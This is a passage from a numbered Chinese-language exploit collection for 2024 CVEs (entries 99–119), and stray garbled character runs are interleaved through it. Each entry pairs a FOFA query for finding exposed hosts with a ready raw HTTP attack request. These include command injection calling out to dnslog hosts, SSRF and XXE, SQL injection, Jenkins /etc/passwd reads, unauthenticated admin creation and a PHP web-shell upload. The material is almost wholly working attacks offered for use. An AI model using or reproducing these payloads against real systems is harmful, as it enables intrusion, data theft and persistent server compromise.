0 _6 ^! b: t; A' J2 vid=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
( b+ G! j# H3 a# ]! N( J% _: Y+ d7 b: B! C% ]
% r: B( D1 o, ~, U& o. q! l
99. Ncast盈可视高清智能录播系统busiFacade RCE
% @1 }+ q, D5 s: |5 hCVE-2024-0305
# S0 v$ X' s/ N1 `! T5 z; jFOFA:app="Ncast-产品" && title=="高清智能录播系统"
. j# c6 T8 }) |/ RPOST /classes/common/busiFacade.php HTTP/1.1
) c+ q9 v. y: t# ^$ J( B$ b x% xHost: 192.168.40.130:8080
: H6 g- [( L; x. HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
9 o) f2 @$ T9 |Connection: close) C7 h2 H* L; s; M5 g+ L
Content-Length: 154
, ^. f S# M9 ZAccept: */*; p4 a9 u0 A. w6 T5 C: s
Accept-Encoding: gzip, deflate! ~2 w4 ?, Q8 M7 J. L7 f
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 W! i1 A# j p+ ]$ eContent-Type: application/x-www-form-urlencoded; charset=UTF-8
* w+ s# R U9 |. Y7 dX-Requested-With: XMLHttpRequest
/ a: T! M: J) U. L3 F" T$ ^4 ^% q" n$ @1 O' f8 m9 E* N! g
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D' ]0 @# T4 W. W$ Q. a! T
1 g; q& F! N- V/ T u U3 N
7 s) y: ]; @( z5 k, g% W6 W
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
/ l; ]6 ^+ |9 a( uCVE-2024-0352
8 J# f5 P9 a, l+ S( ?& e5 tFOFA:icon_hash="874152924"- L( d" V! z/ _; E$ F/ d! F6 w! B) _
POST /api/file/formimage HTTP/1.13 l& E# e, _, H3 l. `* a: a6 `
Host: 192.168.40.1305 _" t$ s+ k; I2 M0 |
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
$ R Z! o) c9 ^# h- W$ n0 yConnection: close
7 O7 b1 a8 l+ ^( W: \& Z. f% QContent-Length: 201, w2 t! C( v8 F1 S. d8 U
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
. f- m/ h+ |* {! `# i7 D/ h3 k7 Y% ZAccept-Encoding: gzip* b7 M1 ]% o* b7 t' p T) D$ K
6 b3 Q$ R2 M7 t& S------WebKitFormBoundarygcflwtei
. z# x: ^4 q! l& ?Content-Disposition: form-data; name="file";filename="IE4MGP.php"/ i3 y1 j7 e, p9 G
Content-Type: application/x-php5 i. f2 I7 ?4 \3 n. n i
, n( r- `% I5 {7 N( x2ayyhRXiAsKXL8olvF5s4qqyI2O8 t" [% w" }9 M- N
------WebKitFormBoundarygcflwtei--+ p( p0 r" ~0 I0 P# t
4 j( O% n. ], u! }5 i2 ]# \8 c
3 h L* b9 C7 H J0 y101. ivanti policy secure-22.6命令注入. ?& E5 \% E8 r$ j
CVE-2024-21887
% t2 x5 n8 [/ mFOFA:body="welcome.cgi?p=logo", h$ E) O) {- P% w, Z
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
) E2 [ X7 b+ w1 p' ?7 |7 iHost: x.x.x.xx.x.x.x' `9 c* Y7 c" S$ g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
" T2 S2 e# ?& c3 A/ V, SConnection: close
2 C `" s& v% R _* {Accept-Encoding: gzip8 `# H) N, n) d6 j! Q+ }
. H6 p5 W% F, u2 c* r' k' Q$ Y* S; Y/ B# h G% J/ r9 F
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行; B4 P# I1 ?9 x4 f' }
CVE-2024-218939 `3 Z' M0 n, p( L
FOFA:body="welcome.cgi?p=logo"0 k* t' m( \# i. |5 }8 [# I" d; ]
POST /dana-ws/saml20.ws HTTP/1.18 i" V A6 M) ^/ P) k
Host: x.x.x.x: k/ g$ V3 u: W8 z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
3 \9 U, H2 T* b8 G8 eConnection: close0 Y- j/ s3 [/ _/ H: E
Content-Length: 792
2 m" i1 p; A7 {# G9 W/ u+ ~( yAccept-Encoding: gzip
q% r% n/ K( C2 z, t
, @- \$ ?% [+ D! l9 ~<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
$ _3 E% h2 h6 u q, i, }. N& R+ t* j- J, A$ M" M* F& K
103. Ivanti Pulse Connect Secure VPN XXE7 u2 l" ?8 _5 t. V. m% P% Q
CVE-2024-22024- g' {* ^* g, Q* H1 r( [- r* a
FOFA:body="welcome.cgi?p=logo"
- E3 ]1 t3 C- G& `$ FPOST /dana-na/auth/saml-sso.cgi HTTP/1.1
" p; u0 q/ c) P; o8 @" _+ kHost: 192.168.40.130:111( Q& G: `9 O: b9 x& v
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
( }" s, \* X( n' AConnection: close
9 Y# T* {* N/ g9 LContent-Length: 2049 c: f+ }2 Y2 E/ h- L C
Content-Type: application/x-www-form-urlencoded* r- X0 _6 [" r5 o! {; T7 W
Accept-Encoding: gzip
# W! e, Z4 Q3 o" F# {4 e5 U
3 i2 X+ x Z, K' ZSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
% K3 A+ y. L6 F; v+ P1 @& }/ e
( X( q! v* |1 o% I
6 {/ `4 S2 I/ y其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
/ N3 V) C9 ~9 \) S+ |<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
, Y" H& C, ~2 H5 Y3 |8 v- Z
* P: _: d& N$ e
$ f1 v/ {3 r1 v; T1 r104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
( g* V5 R' s6 G+ \CVE-2024-0569
+ ] ?0 F- O& u! F( ]: gFOFA:title="TOTOLINK"
( j" o9 N# e6 gPOST /cgi-bin/cstecgi.cgi HTTP/1.1. r; W+ |" X$ @5 R
Host:192.168.0.11 A% |9 N3 {2 T: P
Content-Length:41
C( k8 x/ M& V& x; y9 A/ ? xAccept:application/json,text/javascript,*/*;q=0.01
9 s4 S& I! G) k; xX-Requested-with: XMLHttpRequest
3 z0 V W+ _+ y8 v$ n" TUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
. p. U5 L9 r6 w( l% n z' f2 |$ V) ?Content-Type: application/x-www-form-urlencoded:charset=UTF-8
6 z9 U. p4 {* j1 l# P- J# POrigin: http://192.168.0.1" q: Q* e) f0 {3 [' f; R/ c
Referer: http://192.168.0.1/advance/index.html?time=1671152380564" T0 O$ B$ i% W; Q/ K* ^
Accept-Encoding:gzip,deflate6 I+ P# ]' F* o
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7! t- c' q/ c+ N' t3 `3 t [ Y
Connection:close+ y5 t6 g# ~$ j* h& m4 k
! X# s$ E0 |$ g1 S
{7 p5 \8 p% L, @+ r; o. o& Z
"topicurl":"getSysStatusCfg",
' z9 u6 i3 _; d; H }1 N/ j"token":""+ P. s* [6 t* c, L w. K2 ^
}2 z4 o* o: |4 E7 Y
' z2 w. W/ j l& X2 j105. SpringBlade v3.2.0 export-user SQL 注入- s: K# Q8 z0 [* C# L7 ]6 `
FOFA:body="https://bladex.vip"
, v) Y# E& R: K. x! L" X. C+ `8 M0 U" qhttp://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
: }; d8 p( l+ p6 ]" B/ L8 k9 V9 ~. k4 V/ Q8 Q; \7 I7 u7 l
106. SpringBlade dict-biz/list SQL 注入, o1 j( E4 O$ E' G1 N3 Z: P& \
FOFA:body="Saber 将不能正常工作"
8 g( J7 X0 V9 L2 E9 |8 I) \GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.10 R% E1 `* w3 b. E4 g' y! ?
Host: your-ip
+ c" {. h& ?6 a# M* M0 c0 I- MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
- O% w4 b7 x$ wBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
+ W2 ^/ D& m5 J# I6 k4 tAccept-Encoding: gzip, deflate% R- _& u y; C/ e
Accept-Language: zh-CN,zh;q=0.9
2 ]" {0 ^# F4 @5 yConnection: close, ^4 J+ l4 `4 r5 w5 _3 x
5 V/ J, r/ X! ^! C1 J' m
2 v0 X" e6 G- ^( q# R' F: Z" m107. SpringBlade tenant/list SQL 注入
! B" ?7 q1 E! h2 t) C- a9 KFOFA:body="https://bladex.vip"
- k U' \' T! e4 N- S5 x2 `GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.16 y$ n$ F# R: F1 s4 P. V* x- X
Host: your-ip
0 Z" A( {1 l! P" x( a! IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36! A& Z6 q* S) O! d& f# j# T
Blade-Auth:替换为自己的
% W* @# A5 E+ D( C/ K f [+ s: jConnection: close' p: K: m5 D* K8 S" G8 o; n
8 z: R6 s3 X, b8 P
) H6 ]' B6 E! f! X! d% M) e2 F108. D-Tale 3.9.0 SSRF
9 {1 f% t4 K7 }' {4 p, z0 XCVE-2024-21642
# {: g1 V |1 t+ ^; l7 D8 [$ {FOFA:"dtale/static/images/favicon.png"
1 z9 h$ L( O/ O6 _# Y% m1 C' y) HGET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
) y) X! Q& [8 F+ c7 j: wHost: your-ip
2 x) u1 W( Z/ pAccept: application/json, text/plain, */*
" o' V- U" d! x# U# uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.363 s' L q2 q; k/ s4 k3 u. s
Accept-Encoding: gzip, deflate# y7 M2 D k) A l
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8# l$ n# N$ b' {4 m- v
Connection: close
G- ?+ a) a$ c8 Y3 r+ }) b/ S( ~: ]) M% ?' u+ d' I- s1 R- `
2 J7 l6 C7 g2 ]6 e9 n( {) R* s
109. Jenkins CLI 任意文件读取+ g( M9 M1 J1 S
CVE-2024-23897: z- [* P/ d L, f: J
FOFA:header="X-Jenkins"$ J y+ y& d' _8 X" y0 [
POST /cli?remoting=false HTTP/1.1
; D e) `7 J9 h; m/ ^2 nHost:7 J# {) G% f% ~8 p5 ]
Content-type: application/octet-stream
; X0 _0 |, E% v3 ?+ L+ lSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
7 \ B* I; m; O4 ?Side: upload
' X$ o3 R& \# x' s; xConnection: keep-alive6 \' _' r2 R; b) J3 G1 s
Content-Length: 163! q& ~. F/ Y1 |$ ^
2 Z( l" g ~4 N6 P7 s
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
" D( U8 F/ Y' k/ s7 e
* Q1 E" ~, {/ C& R7 R& m/ }9 N6 s
POST /cli?remoting=false HTTP/1.1, | k* W3 l- \' u6 c/ ^" F
Host:: y! \! f; O+ u1 F* m# z
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92; f- l- b' t6 E9 m5 t
download
& T3 Q# o: O- \( G# ]Content-Type: application/x-www-form-urlencoded' @' y1 {. F, A' }7 h
Content-Length: 0
8 h% c( \: u: F6 w5 h# ~7 d% N8 q! a' Q( p
4 T& j/ c9 n% c! H- O: s
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
f- p. c' e/ mjava -jar jenkins-cli.jar help
! T ^ E# {; H) E# ~[COMMAND]
# y% p3 g u% j& a4 a6 _Lists all the available commands or a detailed description of single command.
% N) r C; ` p5 S; ? COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
6 d( Z& q, y# {$ A) `, y+ o& Z2 ?2 z/ y+ Y5 _5 w# {; u
" J7 N4 @" J0 A3 Z. R
110. Goanywhere MFT 未授权创建管理员" _, i( B% E; L4 w& ^
CVE-2024-02041 h. J3 `5 N% S/ H6 \, n& {* u% k
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
* V. ~5 R8 R: F# V8 }5 [GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
+ E2 M: ~ P7 r( {( P# YHost: 192.168.40.130:8000) U7 U9 J; f3 ?. p: j- n% S
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.363 S& |9 l0 f) F5 Z5 Q* |* d& K
Connection: close
* h2 u* @% R* {, rAccept: */*
0 {" m7 p! H, K+ BAccept-Language: en6 B6 s" ^: R9 x% }
Accept-Encoding: gzip1 _! q- M$ I) T. d6 d8 b
" s. }' f$ P1 q* G4 h
8 _& o k r" L& z
111. WordPress Plugin HTML5 Video Player SQL注入: `* Z6 t% c( i( w
CVE-2024-1061) K$ r/ \, Y# q+ X/ C `7 K
FOFA:"wordpress" && body="html5-video-player"9 Y6 t0 I9 g% I
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1) V2 S' h# d5 z# [- I
Host: 192.168.40.130:112/ N- b& q" e5 H$ ]7 _& N, N. s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
+ I. H* M# v( H6 i1 I; c5 U6 `Connection: close
& [6 Q9 r x. H2 s# zAccept: */*
! Q5 L# T5 n, o# a5 P$ PAccept-Language: en
4 k' _8 y# T& a$ Q! x* ?5 E, sAccept-Encoding: gzip( o* a! X0 w. E; y3 P. p
% V# m, Q! _; `+ z
# J7 M @& Q& t112. WordPress Plugin NotificationX SQL 注入$ `/ x+ w6 N' b8 j! v ?# s# w; c
CVE-2024-1698
+ U; U% p; {! j1 k5 T; y. UFOFA:body="/wp-content/plugins/notificationx"
$ M% c8 i. A/ q7 \+ gPOST /wp-json/notificationx/v1/analytics HTTP/1.15 w; ?6 o1 w0 j# l1 s `$ L
Host: {{Hostname}}
6 z+ g' `; s# f l' X" t$ q* IContent-Type: application/json# Z. U( |0 A7 m& e3 z2 \
5 W- J" Y2 O! e l* Y9 ~{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
& U; F6 e+ T/ c; C6 y) p+ y8 k, w0 P4 ^ l8 O& D
3 J( c5 d+ E+ X U5 W8 z( _1 z; F
113. WordPress Automatic 插件任意文件下载和SSRF4 F- |( z$ V: M( i5 ]2 |
CVE-2024-27954( v3 R9 N: ^4 k3 X
FOFA:"/wp-content/plugins/wp-automatic"7 X$ `; O! A- j4 V, w2 |
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
1 e9 F, S$ s" h9 V* Q, T$ m9 zHost: x.x.x.x/ d, a9 {: v# }, y V# n" l
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
) {# T+ W0 Z* Z4 i/ I: Q" j/ eConnection: close% `4 l; p+ t; m3 B0 H+ }# b3 E) x* ^
Accept: */*! p$ C6 G4 S8 g
Accept-Language: en
$ O P/ X/ `, D; C2 ZAccept-Encoding: gzip/ b3 k* @ V6 X P6 F' Z7 f
! J" R$ f+ I/ M2 }2 ?/ R% |
" f7 q! l$ m/ K" z
114. WordPress MasterStudy LMS插件 SQL注入5 t: d' y0 x) ]1 c6 m: D
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
- w8 X. g g, QGET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.17 J8 I" i7 U' o7 c5 g
Host: your-ip
" o! H5 c3 m4 I( k _: J WUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
, d! ^' w& V2 j# z$ P# aAccept-Charset: utf-8
2 L, ~1 i# L- x' v6 s8 vAccept-Encoding: gzip, deflate% c! P2 p* E& Q; E' R& k4 O8 y' {
Connection: close
) ^0 a! S. s. @" A+ ^( X1 h6 m& L1 Y( ]/ o& u& _
; H3 R" f2 W! n115. WordPress Bricks Builder <= 1.9.6 RCE6 @& p) f q, D' d& S# L6 Y
CVE-2024-256007 s4 A: ^! w+ V, |2 }* v' l8 P- }
FOFA: body="/wp-content/themes/bricks/"" y& i, n9 c. t0 s, T5 A
第一步,获取网站的nonce值
* x6 ]$ ?) I# `% hGET / HTTP/1.1, G7 t! i3 o* C& V( O: k
Host: x.x.x.x7 `% W$ Y/ ^- V$ `' [* [
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
) `8 S! p+ @) L+ A5 W3 M6 WConnection: close; c1 C; E0 Y6 o- d
Accept-Encoding: gzip
% A+ K7 O7 ]- A, M: a$ n
6 d4 v8 b; _9 R( o" e& Y; h4 z- k8 H# ]7 z9 C$ G
第二步替换nonce值,执行命令
1 [$ x' e2 d8 V1 `POST /wp-json/bricks/v1/render_element HTTP/1.1$ Y0 i+ u. |! N, f0 v
Host: x.x.x.x1 @8 G5 y# K6 i e! j
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
% W, u' a) B- } \Connection: close% h% c; ~1 g, W& j
Content-Length: 356
+ ~1 a# ~1 }- K* CContent-Type: application/json
# a" n& X6 c/ Q. AAccept-Encoding: gzip
0 W" h+ ?. M/ K3 J
. e$ r# ?: s6 J" {. O; l% Z{* i. y7 W; O d- Z5 i T
"postId": "1",/ F# \" A: z- d* }! n A
"nonce": "第一步获得的值",
* J! K/ ^0 a0 A8 ?+ m "element": {3 w" w0 U: |) t
"name": "container",$ R, H7 y. J# K h0 D X/ d
"settings": {
- E$ y5 ^7 V( o2 s8 n "hasLoop": "true",1 u) _3 E* D: k
"query": {2 H2 ?! a' \: J$ W! F* t8 t
"useQueryEditor": true,, Q% D) l# E& s! T
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",9 c* T; ]+ B0 V E3 @9 ?
"objectType": "post"
% K9 p9 a3 ?! R0 _ }
# B3 T5 ]2 X7 F5 M0 L }* D& Z" O! e& b# G! D
}. q! z' S: e$ s' t/ y& B' y
}3 Z, u5 ]" |; ]2 H7 \) m+ J" g
5 S, L R4 ], B0 y- U+ X
% r- U9 g W! M' K4 q116. wordpress js-support-ticket文件上传
' B" Y$ j3 X0 HFOFA:body="wp-content/plugins/js-support-ticket"; a& p7 `5 D; r7 O. m* ~
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
$ `: l! D7 W4 p# f9 W. kHost:7 H- ?6 Q1 m7 }- {( z
Content-Type: multipart/form-data; boundary=--------767099171/ c+ }$ ^$ o D$ N9 u/ j$ B1 v; ]
User-Agent: Mozilla/5.0
. j. N0 c+ ~" S. U" R5 y0 j. G( `- Y" i0 l$ y; e
----------7670991710 H8 k! V0 M! ?0 m7 O+ p2 Y
Content-Disposition: form-data; name="action") j2 \* C) y: s4 t* k6 g c- X* c
configuration_saveconfiguration
D: y! v5 z1 N3 Y----------767099171
% ^, ?7 w# j0 i; r$ M/ |& z$ D: KContent-Disposition: form-data; name="form_request"4 O5 W( r& X( W$ \' e8 d4 `
jssupportticket% E! [9 h6 }$ y5 n4 d7 W0 K6 K( J
----------767099171, Z: T1 q4 C! ~
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
2 k' `: }! J8 {6 j/ O! |7 e" fContent-Type: image/png
( x" W6 s0 H. ?----------767099171--
8 X c1 G( N/ d! X* m) ]% {" \3 L# N* G1 B& ^' b
6 `: k! b9 b: Y7 H+ S4 [: j$ @& W117. WordPress LayerSlider插件SQL注入! o6 L. M) E0 M) }7 \0 m
version:7.9.11 – 7.10.0
' O: p x% M) m8 J5 Y7 v6 p6 XFOFA:body="/wp-content/plugins/LayerSlider/"
P+ V0 ^3 ^1 M9 r- ^7 G3 h4 sGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1" j) A) H0 ]/ q3 y1 D2 n
Host: your-ip
3 Q4 i' {' D8 m6 R5 `6 q- B$ m3 wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0+ Y5 r# y {2 J1 z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8; Z$ H0 r. ]6 ~- q9 ]
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) d' N6 z* G" J1 x0 [: @Accept-Encoding: gzip, deflate, br7 D" J& o9 p6 A) z' }# ]+ g+ v
Connection: close e/ K. q3 a" u Y1 L2 Z8 S. J
Upgrade-Insecure-Requests: 1# h5 u( h1 d( z1 O) Z% a" C
- ^: d5 S. S) e* V4 l' e6 _
/ ?& D9 o8 f, I3 x& Z% R6 e118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
0 j! `4 V# e. Y' yCVE-2024-0939
; T6 A% }6 U8 W3 lFOFA:title="Smart管理平台"; m7 e! M* G4 e2 L
POST /Tool/uploadfile.php? HTTP/1.1
! K9 j8 E1 Z: |2 _Host: 192.168.40.130:84437 s+ v+ J( ?& k0 W1 f+ `
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
3 H$ j2 U2 o3 v0 hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0. C' r7 k9 @% z- Q1 h& b- G' L
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 I! O0 j( f+ G3 S: Y5 y: M/ u& a
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 Q8 h0 ^' C( r& v5 q; |Accept-Encoding: gzip, deflate. E+ G% k& e% J. J
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
: [* E0 {! b/ H8 w/ PContent-Length: 405/ f& p3 N8 `: h. Q& X0 W9 J- A
Origin: https://192.168.40.130:8443& X* h# N! l# H( H! l/ F' ~' M
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
# ?" ^( p/ B* U2 q0 q1 DUpgrade-Insecure-Requests: 1
1 n( m' z% G) K6 h9 X6 a9 NSec-Fetch-Dest: document M) u9 A3 t6 [8 j( B
Sec-Fetch-Mode: navigate
9 q4 ?1 h+ H4 i4 p7 R5 e7 }3 PSec-Fetch-Site: same-origin
7 V) k- x Y" F1 zSec-Fetch-User: ?1
& r1 I5 p! ~# ` `Te: trailers
! F1 _1 t0 h+ t- jConnection: close
7 M" X7 i2 ?: F% p; h8 p# ~6 L6 E6 c y/ Q
-----------------------------13979701222747646634037182887+ z! J5 t5 c' h
Content-Disposition: form-data; name="file_upload"; filename="contents.php"& M9 w2 R! |8 y4 p2 s2 d" Y
Content-Type: application/octet-stream
0 L* U' V* l1 D3 n% I. \3 T, b
<?php/ P7 h6 }; d: e; q8 D) o# [, w i
system($_POST["passwd"]);' T; n# K4 Q" S( y7 M; z
?>
1 o5 L0 M w" m `! B/ r0 d% P1 l( G-----------------------------13979701222747646634037182887
2 m. b2 X# L2 Y: \$ E- ?Content-Disposition: form-data; name="txt_path"( k) ?7 \5 c( M
$ \1 i# ^$ j a: m/ j& _/home/src.php
4 w& c+ r1 h6 s2 F-----------------------------13979701222747646634037182887--
" Q( I/ N6 S9 J8 T, H4 K# R& V+ y) s- @. @, a& A: ?
" l# G* m7 Y: F' \4 \访问/home/src.php
1 N( M. T0 S7 C0 t% k0 n0 T- }8 L: Y" s2 Q1 m+ K
119. 北京百绰智能S20后台sysmanageajax.php sql注入
3 S6 e( x/ ~) A6 x( b5 K, }CVE-2024-1254' X/ p! I4 N6 B6 a0 F4 _0 m
FOFA:title="Smart管理平台"
5 E& |* N1 [5 U+ f6 F先登录进入系统,默认账号密码为admin/admin3 Y: Q2 u7 ~7 x! s9 _
POST /sysmanage/sysmanageajax.php HTTP/1.11
+ N. x7 h' ~0 V1 x4 _Host: x.x.x.x' d0 Y7 \' ^( s- v- ?7 o6 n; g7 |
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
$ n5 {. F: {, j, N7 pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.08 M8 a6 d3 a, t$ D
Accept: */*4 m/ J3 ?! z* |, a; E
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 Z0 l- c# y/ |0 h9 I% V$ I5 i7 BAccept-Encoding: gzip, deflate
( _4 |7 Y' Y$ W9 ]Content-Type: application/x-www-form-urlencoded;; e3 e& g1 ~7 s- j0 S
Content-Length: 109
; C1 V$ \1 Q8 {. l" q: }Origin: https://58.18.133.60:8443* E* k8 V1 T* D5 p) j
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php3 l ]) y0 A9 {7 P5 l8 o
Sec-Fetch-Dest: empty% ~. _" g. E4 i1 P! \! m
Sec-Fetch-Mode: cors* x3 h8 A$ V; J
Sec-Fetch-Site: same-origin
3 O v) h5 {. U" v; ?7 t9 SX-Forwarded-For: 1.1.1.1
1 p9 P3 [% ?7 H. KX-Originating-Ip: 1.1.1.1( R) d0 y% x4 U
X-Remote-Ip: 1.1.1.1
$ F; o' I2 [. F" eX-Remote-Addr: 1.1.1.1
: q k; ~$ _2 w, R# {Te: trailers
# Y- y4 p9 I$ a9 a, ^9 H3 QConnection: close9 V& W% H/ \5 k5 ?6 d
0 P H/ @/ L) dsrc=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
7 J2 m: G( } E% ^6 A
